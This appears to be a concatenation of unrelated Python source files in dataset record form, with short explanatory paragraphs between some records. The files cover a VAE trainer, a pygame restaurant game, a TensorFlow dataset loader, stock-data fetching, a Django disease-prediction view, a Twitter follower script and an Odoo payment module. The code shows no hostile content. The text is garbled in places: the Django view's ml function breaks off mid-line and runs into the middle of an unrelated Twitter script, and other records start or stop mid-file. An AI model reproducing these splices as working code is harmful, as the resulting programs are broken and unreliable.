*\n batch_idx / len(train_loader), loss.item() / len(data)\n ))\n\n print('====> Epoch: {} Average loss: {:.4f}'.format(\n epoch, train_loss / len(train_loader.dataset)))\n\n\ndef test(config, epoch):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for i, (data, _) in enumerate(test_loader):\n data = data.to(device)\n recon_batch, mu, logvar = model(data)\n test_loss += loss_function(recon_batch, data, mu, logvar).item()\n if i == 0:\n n = min(data.size(0), 8)\n comparison = torch.cat([data[:n],\n recon_batch.view(config.batch_size, 1, 28, 28)[:n]])\n torchvision.utils.save_image(comparison.cpu(),\n 'outputs/vae-reconstruction_' + str(epoch) + '.png', nrow=n)\n\n test_loss /= len(test_loader.dataset)\n print('====> Test set loss: {:.4f}'.format(test_loss))\n\n\nmodel = VAE().to(device)\n\nif __name__ == \"__main__\":\n print(config)\n if config.subcommand is None:\n print(\"Error: please specify subcommand: train or eval\")\n sys.exit(1)\n if config.subcommand == \"train\":\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n for epoch in range(1, config.epochs + 1):\n train(config, epoch)\n test(config, epoch)\n with torch.no_grad():\n sample = torch.randn(64, 20).to(device)\n sample = model.decode(sample).cpu()\n torchvision.utils.save_image(sample.view(64, 1, 28, 28),\n 'outputs/vae-sample_' + str(epoch) + '.png')\n torch.save(model.state_dict(), 'saved_models/vae.pth')\n if config.subcommand == \"eval\":\n model.load_state_dict(torch.load('saved_models/vae.pth'))\n sample1 = torch.randn(1, 20)\n sample2 = torch.randn(1, 20)\n ds = (sample2 - sample1) / 63\n samples = []\n for i in range(64):\n samples.append(sample1 + ds * i)\n samples = torch.stack(samples).to(device)\n samples = model.decode(samples).cpu()\n torchvision.utils.save_image(samples.view(64, 1, 28, 28),\n 'outputs/vae-output.png')\n","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
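Two ideas carry the script above: the reparameterization trick, which rewrites sampling as z = mu + eps * std so gradients can flow through mu and logvar, and the ELBO loss, reconstruction error plus a KL term. A standalone sketch with illustrative shapes (the tensors here are stand-ins, not the model's activations):

import torch
import torch.nn.functional as F

mu = torch.zeros(4, 20)
logvar = torch.zeros(4, 20)
std = torch.exp(0.5 * logvar)
z = mu + torch.randn_like(std) * std            # differentiable sample of q(z|x)

x = torch.rand(4, 784)                          # stand-in input batch
recon = torch.sigmoid(torch.randn(4, 784))      # stand-in decoder output in (0, 1)
bce = F.binary_cross_entropy(recon, x, reduction='sum')
kld = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
loss = bce + kld                                # negative ELBO, as in the script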
+{"seq_id":"398504560","text":"import fazbear.Globals as Globals\nimport pygame\nimport lightning\nimport time\nfrom pygame.locals import *\n\nclass Game(lightning.engine.Engine):\n '''Main game.'''\n\n # Constants\n EASY = \"easy\"\n NORMAL = \"normal\"\n HARD = \"hard\"\n\n MOVE_TOWARDS = \"move_towards\"\n TAKE_FOOD = \"take_food\"\n GIVE_FOOD = \"give_food\"\n STUFF_SUIT = \"stuff_suit\"\n CLEAN = \"clean\"\n KILL = \"kill\"\n\n\n def __init__(self, difficulty=NORMAL):\n super().__init__(W=800, H=600, caption=\"Fazbear Management PRE-ALPHA\")\n self.time = 6\n self.money = 100\n self.popularity = 50\n self.day = 1\n self.year = 1987\n self.difficulty = difficulty\n self.running = True\n\n self.timeText = lightning.text.Text(\"Time: %s\" %(self.time), (255,255,255), 15, 15, size=32)\n self.moneyText = lightning.text.Text(\"%s $\" %(self.money), (125,255,125), 15, 575, size=32)\n self.popularityText = lightning.text.Text(\"Popularity: %s %s\" %(self.popularity, \"%\"), (255,255,255), 15, 545, size=32)\n self.dayText = lightning.text.Text(\"Day %s\" %(self.day), (255,255,255), 15, 45, size=32)\n self.yearText = lightning.text.Text(\"Year: %s\" %(self.year), (255,255,255), 15, 75, size=32)\n\n self.initialize_map(\"maps\\\\freddy1.tmx\", 10, 10)\n\n self.main_loop()\n\n def initialize_map(self, map, focus_x, focus_y):\n self.load_map(map)\n self.tilemap.set_focus(focus_x, focus_y)\n\n self.objects = Objects()\n self.NPCs = Objects()\n self.objectsLayer = self.tilemap.layers[\"objects\"]\n self.topLayer = self.tilemap.layers[\"top\"]\n self.middleLayer = self.tilemap.layers[\"middle\"]\n self.layout = self.tilemap.layers[\"layout\"]\n\n print(self.layout[39, 13])\n\n for object in self.objectsLayer.objects:\n if object.type == \"table\":\n self.objects.add(Table(object, self.tilemap))\n\n if object.type == \"door_entrance\":\n self.objects.add(Door(object, self.tilemap, entrance_door=True))\n\n if object.type == \"door_staff\":\n self.objects.add(Door(object, self.tilemap, staff_door=True))\n\n if object.type == \"animatronic\":\n self.objects.add(Animatronic(object, self.tilemap))\n\n if object.type == \"NPC\":\n self.NPCs.add(NPC(object, self.tilemap))\n\n def handle_events(self):\n for event in pygame.event.get():\n\n if event.type == QUIT:\n self.running = False\n pygame.quit()\n return False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 4:\n Globals.mouseScrollUp = True\n\n if event.type == MOUSEBUTTONUP and event.button == 4:\n Globals.mouseScrollUp = False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 5:\n Globals.mouseScrollDown = True\n\n if event.type == MOUSEBUTTONUP and event.button == 5:\n Globals.mouseScrollDown = False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 1:\n Globals.mouseClick = True\n\n if event.type == MOUSEBUTTONUP and event.button == 1:\n Globals.mouseClick = False\n\n if event.type == MOUSEMOTION:\n Globals.mousePos = event.pos\n Globals.mouseRel = event.rel\n\n if event.type == KEYDOWN:\n if event.key == K_UP:\n self.bonnie.moveUp()\n\n if event.key == K_DOWN:\n self.bonnie.moveDown()\n\n if event.key == K_LEFT:\n self.bonnie.moveLeft()\n\n if event.key == K_RIGHT:\n self.bonnie.moveRight()\n\n return True\n\n def main_loop(self):\n\n pygame.init()\n\n self.bonnie = self.NPCs[\"Bonnie_broken\"]\n\n for i in self.objects:\n print(i)\n\n while self.running:\n\n Globals.mouseRel = (0, 0)\n\n if self.handle_events():\n\n self.dt = self.clock.tick(60)\n self.screen.fill((0, 0, 0))\n\n if Globals.mouseClick and ((self.tilemap.fx <= 
self.tilemap.px_width) or (self.tilemap.fy <= self.tilemap.px_height)):\n self.tilemap.set_focus(self.tilemap.fx - Globals.mouseRel[0], self.tilemap.fy - Globals.mouseRel[1])\n\n self.tilemap.draw(self.screen)\n self.tilemap.update(self.dt)\n\n self.timeText.draw(self.screen)\n self.timeText.update(\"Time: %s\" %(self.time))\n\n self.yearText.draw(self.screen)\n self.yearText.update(\"Year: %s\" %(self.year))\n\n self.dayText.draw(self.screen)\n self.dayText.update(\"Day %s\" %(self.day))\n\n self.popularityText.draw(self.screen)\n self.popularityText.update(\"Popularity: %s %s\" %(self.popularity, \"%\"))\n\n self.moneyText.draw(self.screen)\n self.moneyText.update(\"%s $\" %(self.money))\n\n pygame.display.flip()\n\nclass Objects(list):\n def __init__(self):\n self.objects = {}\n\n def __getitem__(self, key):\n return self.objects.get(key)\n\n def __iter__(self):\n return self.objects.values().__iter__()\n\n def add(self, object):\n self.objects[object.name] = object\n\n def delete(self, obj_name):\n del self.objects[obj_name]\n\nclass TMX_Object():\n '''Base object class.'''\n def __init__(self, object, tilemap):\n self.object = object\n self.tilemap = tilemap\n self.name = object.name\n self.type = object.type\n self.properties = object.properties\n self.px, self.py = object.px, object.py\n self.x, self.y = pixel_to_screen(self.px, self.py)\n\n self.objectsLayer = self.tilemap.layers[\"objects\"]\n self.topLayer = self.tilemap.layers[\"top\"]\n self.middleLayer = self.tilemap.layers[\"middle\"]\n self.layout = self.tilemap.layers[\"layout\"]\n\n def __repr__(self):\n return '<%s \"%s\" at 0x%x>' % (self.__class__.__name__, self.name, id(self))\n\n def update(self):\n self.object.px = self.px\n self.object.py = self.py\n self.object.name = self.name\n self.object.type = self.type\n self.object.properties = self.properties\n self.x, self.y = pixel_to_screen(self.px, self.py)\n\nclass Table(TMX_Object):\n def __init__(self, object, tilemap):\n if object.type == \"table\":\n super().__init__(object, tilemap)\n\n else:\n raise ValueError('Object type is not \"table\".')\n\nclass Door(TMX_Object):\n def __init__(self, object, tilemap, staff_door=False, entrance_door=False):\n if object.type in [\"door_entrance\", \"door_staff\", \"door\"]:\n super().__init__(object, tilemap)\n self.staff_door = staff_door\n self.entrance_door = entrance_door\n\n else:\n raise ValueError('Object type is not \"door_entrance\", \"door_staff\" or \"door\"')\n\nclass NPC(TMX_Object):\n '''Base class for all NPCs.'''\n def __init__(self, object, tilemap):\n if object.type in [\"NPC\", \"animatronic\", \"staff\"]:\n super().__init__(object, tilemap)\n self.objective = None\n self.target = None\n\n else:\n raise ValueError('Object type is not \"NPC\", \"animatronic\" or \"staff\"')\n\n def moveUp(self):\n if self.layout[self.x, self.y] is not None:\n if self.layout[self.x, self.y].tile.gid not in [1, 9, 17, 42]:\n self.py = pixel_from_screen(y=self.y - 1)\n self.update()\n return True\n return False\n\n def moveDown(self):\n if self.layout[self.x, self.y + 2] != None:\n if self.layout[self.x, self.y + 2].tile.gid not in [1, 9, 17, 42]:\n self.py = pixel_from_screen(y=self.y + 1)\n self.update()\n return True\n return False\n\n def moveLeft(self):\n if self.layout[self.x - 1, self.y + 1] is not None:\n if self.layout[self.x - 1, self.y + 1].tile.gid not in [1, 9, 17, 42]:\n self.px = pixel_from_screen(x=self.x - 1)\n self.update()\n return True\n return False\n\n def moveRight(self):\n if self.layout[self.x + 1, 
self.y + 1] is not None:\n if self.layout[self.x + 1, self.y + 1].tile.gid not in [1, 9, 17, 42]:\n self.px = pixel_from_screen(x=self.x + 1)\n self.update()\n return True\n return False\n\nclass Animatronic(NPC):\n def __init__(self, object, tilemap):\n if object.type == \"animatronic\":\n super().__init__(object, tilemap)\n\n else:\n raise ValueError('Object type is not \"animatronic\"')\n\nclass Child(NPC):\n def __init__(self, object, tilemap):\n if object.type == \"child\":\n super().__init__(object, tilemap)\n self.happiness = 50\n self.hunger = 0\n self.isAlive = True\n\ndef pixel_to_screen(px=None, py=None):\n if px is not None and py is not None:\n x = int(round(px / 32, 0))\n y = int(round(py / 32, 0))\n return x, y\n\n if px is not None and py is None:\n x = int(round(px / 32, 0))\n return x\n\n if px is None and py is not None:\n y = int(round(py / 32, 0))\n return y\n\n if px is None and py is None:\n return None\n\ndef pixel_from_screen(x=None, y=None):\n if x is not None and y is not None:\n px = int(round(x * 32, 0))\n py = int(round(y * 32, 0))\n return px, py\n\n if x is not None and y is None:\n px = int(round(x * 32, 0))\n return px\n\n if x is None and y is not None:\n py = int(round(y * 32, 0))\n return py\n\n if x is None and y is None:\n return None\n","sub_path":"fazbear/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
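The movement code above keys everything off a fixed 32-pixel tile: pixel_to_screen divides by 32 and rounds, pixel_from_screen multiplies back. A tiny round-trip check of that convention (TILE and the helper names here are assumptions):

TILE = 32

def to_tile(px):
    return int(round(px / TILE))

def to_pixel(x):
    return x * TILE

assert to_tile(to_pixel(13)) == 13   # converting back and forth is lossless
assert to_tile(95) == 3              # 95 / 32 = 2.97, rounded to the nearest tile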
+{"seq_id":"46453285","text":"import itertools\nimport os\nimport random\nfrom collections import OrderedDict\nimport tensorflow as tf\nimport numpy as np\n\nfrom .base_dataset import VideoDataset\n\n\nclass SweeperVideoDataset(VideoDataset):\n def __init__(self, *args, **kwargs):\n super(SweeperVideoDataset, self).__init__(*args, **kwargs)\n self.dataset_name = os.path.basename(os.path.split(self.input_dir)[0])\n self.state_like_names_and_shapes['images'] = 'move/%d/image/encoded', (64, 64, 3)\n self.state_like_names_and_shapes['states'] = 'move/%d/state/position', (5,)\n self.action_like_names_and_shapes['actions'] = 'move/%d/action/velocity', (5,)\n self._check_or_infer_shapes()\n\n self.sess = tf.Session()\n\n def get_default_hparams_dict(self):\n default_hparams = super(SweeperVideoDataset, self).get_default_hparams_dict()\n hparams = dict(\n context_frames=2,\n sequence_length=15,\n use_state=True,\n )\n return dict(itertools.chain(default_hparams.items(), hparams.items()))\n\n @property\n def jpeg_encoding(self):\n return True\n\n def num_examples_per_epoch(self):\n #if os.path.basename(self.input_dir) == 'random_tf_records':\n # count = 900\n #else:\n # raise NotImplementedError\n return 1000\n\n def parser(self, serialized_example):\n \"\"\"\n Parses a single tf.train.Example into images, states, actions, etc tensors.\n \"\"\"\n features = dict()\n for i in range(self._max_sequence_length):\n for example_name, (name, shape) in self.state_like_names_and_shapes.items():\n if example_name == 'images': # special handling for image\n features[name % i] = tf.FixedLenFeature([64*64*3], tf.string)\n else:\n features[name % i] = tf.FixedLenFeature(shape, tf.float32)\n for i in range(self._max_sequence_length - 1):\n for example_name, (name, shape) in self.action_like_names_and_shapes.items():\n features[name % i] = tf.FixedLenFeature(shape, tf.float32)\n\n # add boolean feature for action\n features['action_exist'] = tf.FixedLenFeature([1], tf.int64)\n\n # check that the features are in the tfrecord\n for name in features.keys():\n if name not in self._dict_message['features']['feature']:\n raise ValueError('Feature with name %s not found in tfrecord. 
Possible feature names are:\\n%s' %\n (name, '\\n'.join(sorted(self._dict_message['features']['feature'].keys()))))\n\n # parse all the features of all time steps together\n features = tf.parse_single_example(serialized_example, features=features)\n\n state_like_seqs = OrderedDict([(example_name, []) for example_name in self.state_like_names_and_shapes])\n action_like_seqs = OrderedDict([(example_name, []) for example_name in self.action_like_names_and_shapes])\n for i in range(self._max_sequence_length):\n for example_name, (name, shape) in self.state_like_names_and_shapes.items():\n state_like_seqs[example_name].append(features[name % i])\n for i in range(self._max_sequence_length - 1):\n for example_name, (name, shape) in self.action_like_names_and_shapes.items():\n action_like_seqs[example_name].append(features[name % i])\n\n # set infer action variable\n # infer_action = 1 - features['action_exist']\n\n # for this class, it's much faster to decode and preprocess the entire sequence before sampling a slice\n _, image_shape = self.state_like_names_and_shapes['images']\n state_like_seqs['images'] = self.decode_and_preprocess_images(state_like_seqs['images'], image_shape)\n\n state_like_seqs, action_like_seqs = \\\n self.slice_sequences(state_like_seqs, action_like_seqs, self._max_sequence_length)\n return state_like_seqs, action_like_seqs #, infer_action\n\n # def make_batch(self, batch_size):\n # filenames = self.filenames\n # if self.mode == 'train':\n # random.shuffle(filenames)\n\n # dataset = tf.data.TFRecordDataset(filenames)\n # dataset = dataset.map(self.parser, num_parallel_calls=batch_size)\n # dataset.prefetch(2 * batch_size)\n\n # # Could shuffle individual samples but it becomes too slow. Just shuffle filenames instead.\n # # if self.mode == 'train':\n # # min_queue_examples = int(\n # # self.num_examples_per_epoch() * 0.4)\n # # # Ensure that the capacity is sufficiently large to provide good random\n # # # shuffling.\n # # dataset = dataset.shuffle(buffer_size=min_queue_examples + 3 * batch_size)\n\n # dataset = dataset.repeat(self.num_epochs)\n # dataset = dataset.batch(batch_size)\n # iterator = dataset.make_one_shot_iterator()\n # state_like_batches, action_like_batches, infer_action = iterator.get_next()\n # infer_action = self.sess.run(infer_action)\n # # import pdb; pdb.set_trace()\n\n # infer_action_batches = {'infer_action': infer_action}\n # input_batches = OrderedDict(list(state_like_batches.items()) + list(action_like_batches.items()) + list(infer_action_batches.items()))\n # for input_batch in input_batches.values():\n # if isinstance(input_batch, np.ndarray):\n # input_batch = np.reshape(input_batch, [batch_size, 1])\n # else:\n # input_batch.set_shape([batch_size] + [None] * (input_batch.shape.ndims - 1))\n # target_batches = state_like_batches['images'][:, self.hparams.context_frames:]\n # return input_batches, target_batches\n","sub_path":"video_prediction/datasets/sweeper_dataset.py","file_name":"sweeper_dataset.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
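The parser above follows the usual TF 1.x pattern for fixed-length sequences: declare one FixedLenFeature per (timestep, field) key, then decode them all in a single tf.parse_single_example call. A reduced sketch of that pattern, assuming the same TF 1.x API and using only the state key from the record:

import tensorflow as tf  # assumes the TF 1.x API used by the dataset class

def parse_positions(serialized_example, max_steps=15):
    features = {}
    for i in range(max_steps):
        # One key per timestep; the shape must match what was written.
        features['move/%d/state/position' % i] = tf.FixedLenFeature([5], tf.float32)
    return tf.parse_single_example(serialized_example, features=features)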
+{"seq_id":"307847047","text":"def get_number_of_phrases():\r\n number = input(\"Enter number of phrases and press Enter: \")\r\n if number.isdigit():\r\n return int(number)\r\n else:\r\n return 3\r\n\r\n\r\ndef numeration_of_phrases(number):\r\n if number == 1:\r\n return \"First\"\r\n elif number == 2:\r\n return \"Second\"\r\n elif number == 3:\r\n return \"Third\"\r\n else:\r\n return f\"{number}th\"\r\n\r\n\r\ndef main():\r\n max_phrases_count = get_number_of_phrases()\r\n with open(\"phrases.out\", \"w\") as f:\r\n for number in range(1, max_phrases_count + 1):\r\n phrase = input(\"Enter the phrase and press Enter: \")\r\n if phrase == \"\":\r\n print(\"Thank you!\")\r\n return\r\n\r\n r_phrasse = phrase[::-1]\r\n number_of_phrase = numeration_of_phrases(number)\r\n print(f\"{number_of_phrase} phrase: {r_phrasse}\", file=f)\r\n\r\n print(\"Thank you!\")\r\n\r\n\r\nmain()\r\n","sub_path":"lesson7/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"454500328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 11 20:51:55 2020\n\n@author: hs101\n\"\"\"\n\n'''\n看看有多少种不同的股票\n保存文件stocks.csv\nReturns:\n 股票属性[股票代码,总市值,市盈率,每股收益]\nAttributes:\n 每股收益:指定日前推12个月的净利润除以最新总股本计算的每股收益。\n'''\n\nimport datetime\nfrom WindPy import w\nimport pandas as pd\ndataRaw = pd.read_csv('funds.csv',encoding = 'gbk').drop(columns = 'Unnamed: 0')\n\n\ndef count_time(func):\n def time(*args, **kwargs):\n start_time = datetime.datetime.now() # 程序开始时间\n result = func(*args, **kwargs)\n over_time = datetime.datetime.now() # 程序结束时间\n total_time = (over_time-start_time).total_seconds()\n print('程序 %s 共计%s秒' %(str(func).split(\" \")[1].ljust(15,\".\"),total_time))\n return result\n return time\n\n\n@count_time\ndef stocks_adding(stock_code_list):\n stocks_add = pd.DataFrame()\n for code in stock_code_list:\n stocks_add_temp = w.wsd(code, \"eps_ttm,avgreturny\", \"2020-05-12\", \"2020-05-12\", \"returnType=1\",usedf = True)[1]\n stocks_add = pd.concat([stocks_add,stocks_add_temp],sort=True).reset_index(drop=True) \n return stocks_add\n\n@count_time\ndef windProcess(stock_code_list):\n #stocks = w.wss(stock_code_list, \"province,mkt_cap_CSRC,pb_lyr\",\"unit=1;tradeDate=20200510\",usedf=True)[1]\n# stocks = w.wss(stock_code_list, \"ev3,pb_lyr\",\"unit=1; tradeDate=20200510; currencyType=rmb\",usedf=True)[1]\n\n# new_stock_code_list = stock_code_list[1:10]\n# stocks_add = stocks_adding(new_stock_code_list)\n # 省份 总市值 账面市值比 \n # 还缺一个变量 过去十二个月的收益 也就是动量\n stocks = w.wss(stock_code_list, \"ev3,pb_lyr,eps_ttm\",\"unit=1; tradeDate=20200510; currencyType=rmb\",usedf=True)[1]\n return stocks\n\n\n@count_time\ndef show_df(df): \n def printing(string):\n print(string.ljust(73,'-'))\n def printed(string):\n print(string.ljust(73,'='))\n print()\n printed(\"BEGIN\")\n printing(\"Index\")\n print(df.index)\n printing(\"Columns\")\n print(df.columns)\n printing(\"Head\")\n print(df.head())\n printing(\"Tail\" )\n print(df.tail())\n printed(\"END\")\n print()\n\n@count_time\ndef write_file(df,name,encoding = 'gbk'):\n df.to_csv(name, mode ='w+',encoding = 'gbk') \n \n@count_time\ndef main():\n fund = dataRaw\n lst = []\n count=0\n for i in range(1,11):\n count+=1\n # print(count)\n data = fund.iloc[:,2*i+1]\n for item in data:\n if item not in lst:\n lst.append(item) \n stock_code_list = lst\n \n stocks = windProcess(stock_code_list) \n show_df(stocks) \n write_file(stocks, \"stocks.csv\")\n\nif __name__ == '__main__':\n w.start() \n main()\n# w.stop()\n","sub_path":"WindFunds/数据备份 第三轮 第二天/DataBackUp/第二轮 第三天/process2.py","file_name":"process2.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"502810791","text":"#!/usr/bin/python\nimport os,conf\n\nimport signal\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\ndef makeDirectory(dirname):\n\tif not os.path.exists(dirname):\n\t\tos.mkdir(dirname)\n\nmakeDirectory(conf.LOGDIR)\nxmls = os.listdir(conf.XMLDIR)\n\nminIndex=0\nmaxIndex=len(xmls)\n#minIndex=100\n#maxIndex=200\n\nfor xml in xmls:\n\tsuffix = '.' + xml.split('.')[-1] # suffix = .slcio\n\tbasename = xml.split(suffix)[0]\n\tindex = basename.split('_')[-1]\n\tif int(index) <= maxIndex and int(index) > minIndex :\n\t\tcmd = \"bsub -q s \" + \"-o \"+conf.LOGDIR+\"/\" + basename + \".log \" + '\\\"Marlin ' + conf.XMLDIR + '/' + xml.strip() + '\\\"'\n\t\tos.system(cmd)\n\t\t#print cmd\n\n","sub_path":"gen/SplitLcioFile/manyrun.py","file_name":"manyrun.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"317493321","text":"from PyQt5.QtWidgets import QApplication\nfrom ui.window import MainWindow\nimport sys\n\nif __name__ == \"__main__\":\n app = QApplication([])\n app.setApplicationName(\"Histogram Matcher\")\n\n window = MainWindow()\n window.setWindowTitle(\"BLG 453E - Homework I - Histogram Matching\")\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"253130610","text":"\n\nfrom xai.brain.wordbase.verbs._repay import _REPAY\n\n#calss header\nclass _REPAYS(_REPAY, ):\n\tdef __init__(self,): \n\t\t_REPAY.__init__(self)\n\t\tself.name = \"REPAYS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"repay\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_repays.py","file_name":"_repays.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"451018817","text":"from django.shortcuts import render\nfrom . import forms\nimport pickle\nfrom DiseasePredictor import settings\nimport os\n\nBASE_DIR = settings.BASE_DIR\ncommon = pickle.load(open(os.path.join(BASE_DIR,'media','data','common.p'), \"rb\"))\nuncommon = pickle.load(open(os.path.join(BASE_DIR,'media','data','uncommon.p'), \"rb\"))\nall_ordered = pickle.load(open(os.path.join(BASE_DIR,'media','data','all_ordered.p'), \"rb\"))\n\ndef input_view(request):\n\n if request.method==\"POST\":\n\n symptoms_form = forms.Symptom_Form(data = request.POST)\n if symptoms_form.is_valid():\n disease_prediction = ml(symptoms_form.cleaned_data)\n print(symptoms_form.cleaned_data)\n if len(disease_prediction)==1:\n return render(request, \"result.html\", {'multiple': 0, 'prognosis': disease_prediction[0][0]})\n else:\n return render(request, \"result.html\", {'multiple': 1, 'prognosis': disease_prediction})\n \n return render(request, \"something_wrong.html\", {'message' : \"Something went wrong!\"})\n \n return render(request, \"input.html\",{'form': forms.Symptom_Form, 'common': common,'uncommon':uncommon, 'length':7})\n\n\n\n\ndef ml(clean_data):\n values_1 = [ i for i in clean_data.values() ]\n l = [ all_ordered[i] for i in values_1 if i!='' ]\n \n test_list = [ 0 for i in range(132) ]\n for i in l :\n test_list[i] = 1\n \n model = None\n label_coder = None\n # with open('media/models/model_rf.sav', 'rb') as fp:\n with open('media/models/model_rf_64.sav', 'rb') as fp:\n model = pickle.load(fp)\n # with open('media/models/label_coder.sav', 'rb') as fp:\n with open('media/models/label_coder_64.sav', 'rb') as fp:\n label_coder = pickle.load(fp)\n ls = []\n threshold = 15\n\n result = model.predict_proba([test_list])\n for i in range(0,len(result[0])):\n if result[0][i]!=0:\n ls.append((label_coder.inverse_transform([i,]),(result[0][i]*100)))\n\n ls = sorted([ (i[0][0],int(i[1])) for i in ls if i[1]>=threshold ] , reverse=True, key=lambda x: x[1])\n if ls[0][1]=10:\n # print u.followers_count\n if u.followers_count >= 0:\n list.write(u.screen_name + '\\n')\n\n flag += 1\n else:\n u = next(user)\n except:\n time.sleep(15 * 60)\n print(\"we got a timeout\")\n u = next(user)\n list.write(u.screen_name + '\\n')\n flag += 1\nlist.close()\n\n#public_tweets = api.user_timeline('LeoDiCaprio')\n\n#for tweet in public_tweets:\n# print tweet.text\n\n","sub_path":"src/get_user_id.py","file_name":"get_user_id.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"369145002","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass BankRecordsCancel(models.TransientModel):\n _name = 'account.bank.records.cancel'\n\n _description = _('Ventana para cancelar registros bancarios')\n\n description = fields.Text('Descripción', required=True)\n record_id = fields.Many2one('account.payment', 'Registro bancario')\n\n @api.multi\n def confirm_cancel(self):\n \"\"\"\n Cancelamos depósito/transferencia (Registros bancarios)\n :return:\n \"\"\"\n move = self.record_id.move_id\n move.reverse_moves(move.date, move.journal_id or False)\n move.write({'state': 'cancel', 'ref': self.description})\n self.record_id.update({'state': 'cancelled'})\n return True\n\n\nclass Payment(models.Model):\n _inherit = \"account.payment\"\n\n @api.onchange('amount', 'currency_id')\n def _onchange_amount(self):\n \"\"\"\n MM: Lo cambiamos porqué sale error en moneda\n \"\"\"\n return\n\n @api.multi\n def action_button_cancel(self):\n \"\"\"\n Abrimos venta emergente para cancelar depósito/transferencia si està\n en estado borrador cancelamos la misma\n :return: dict\n \"\"\"\n if self.state == 'draft':\n return self.write({'state': 'cancelled'})\n context = {\n 'default_record_id': self.id\n }\n return {\n 'name': _(\"Explique la razón\"),\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_model': 'account.bank.records.cancel',\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n 'context': context\n }\n\n @api.model\n def create(self, vals):\n \"\"\"\n MM: Creamos nuevo registro y validamos período contable\n :param vals:\n :return: object\n \"\"\"\n if 'date_payment' in vals:\n self.env['account.fiscal.year'].valid_period(vals['date_payment'])\n res = super(Payment, self).create(vals)\n return res\n\n @api.multi\n def post_transfer(self):\n \"\"\"\n Confirmamos la transferencia, creamos el asiento contable con los datos ingresados\n :return:\n \"\"\"\n company = self.company_id\n domain = [\n ('name', '=', 'Transferencia bancaria'),\n ('company_id', '=', company.id)\n ]\n journal = self.env['account.journal'].search(domain, limit=1)\n if not journal:\n raise UserError(_(\"No está definido el diario (Transferencia bancaria) para compañía: %s\") % company.name)\n move = self.env['account.move'].create({\n 'journal_id': journal.id,\n 'date': self.payment_date,\n 'ref': self.communication or '/'\n })\n self.env['account.move.line'].with_context(check_move_validity=False).create(\n {'name': self.communication,\n 'journal_id': journal.id,\n 'account_id': self.journal_id.default_debit_account_id.id,\n 'move_id': move.id,\n 'credit': 0.0,\n 'debit': self.amount,\n 'date': self.payment_date,\n })\n self.env['account.move.line'].with_context(check_move_validity=True).create(\n {'name': _(\"De \") + self.journal_id.name + _(\" a \") + self.destination_journal_id.name,\n 'journal_id': journal.id,\n 'account_id': self.destination_journal_id.default_credit_account_id.id,\n 'move_id': move.id,\n 'credit': self.amount,\n 'debit': 0.0,\n 'date': self.payment_date\n })\n move.post()\n return self.write({\n 'state': 'posted',\n 'name': move.name,\n 'move_id': move.id\n })\n\n @api.multi\n def unlink(self):\n for record in self:\n if record.move_id:\n raise UserError(_(\n 'No puedes borrar un registro bancario con asiento contable.'))\n return super(Payment, self).unlink()\n\n name = fields.Char(readonly=True, copy=False, default=\"Nuevo\") # CM\n journal_id = fields.Many2one('account.journal', domain=None) # CM TODO: 
Revisar soló salgan diarios tipo banco\n move_id = fields.Many2one('account.move', string=\"Asiento contable\", readonly=True)\n company_id = fields.Many2one('res.company', related=False, string='Compañía', readonly=False,\n default=lambda self: self.env.user.company_id) # CM\n # Campos para depósitos bancarios\n type_deposit = fields.Selection([\n ('cash', 'Depósito directo (Efectivo)'),\n ('external_checks', 'Cheques externos')\n ], string=\"Tipo de depósito\", default='cash')\n\n def _get_move_lines(self, move_line, move_id):\n \"\"\"\n Creamos líneas de movimiento contable dependiendo del tipo de depósito\n :return:\n \"\"\"\n if self.type_deposit == 'cash':\n for line in self.deposit_line_cash:\n move_line.create({\n 'name': line.reference or '/',\n 'journal_id': move_id.journal_id.id,\n 'account_id': line.account_id.id,\n 'move_id': move_id.id,\n 'debit': 0.0,\n 'credit': line.amount,\n 'date': self.payment_date,\n })\n if self.type_deposit == 'external_checks':\n for line in self.deposit_line_external_checks:\n move_line.create({\n 'name': \"%s: %s\" % (line.bank_id.name, line.check_number),\n 'journal_id': move_id.journal_id.id,\n 'account_id': line.account_id.id,\n 'move_id': move_id.id,\n 'debit': 0.0,\n 'credit': line.amount,\n 'date': self.payment_date,\n })\n\n @api.multi\n def post_deposit(self):\n \"\"\"\n Confirmamos el depósito, creamos el asiento contable con los datos ingresados\n :return:\n \"\"\"\n company = self.company_id\n domain = [\n ('name', '=', 'Depósito bancario'),\n ('company_id', '=', company.id)\n ]\n journal = self.env['account.journal'].search(domain, limit=1)\n if not journal:\n raise UserError(_(\"No está definido el diario (Depósito bancario) para compañía: %s\") % company.name)\n move_id = 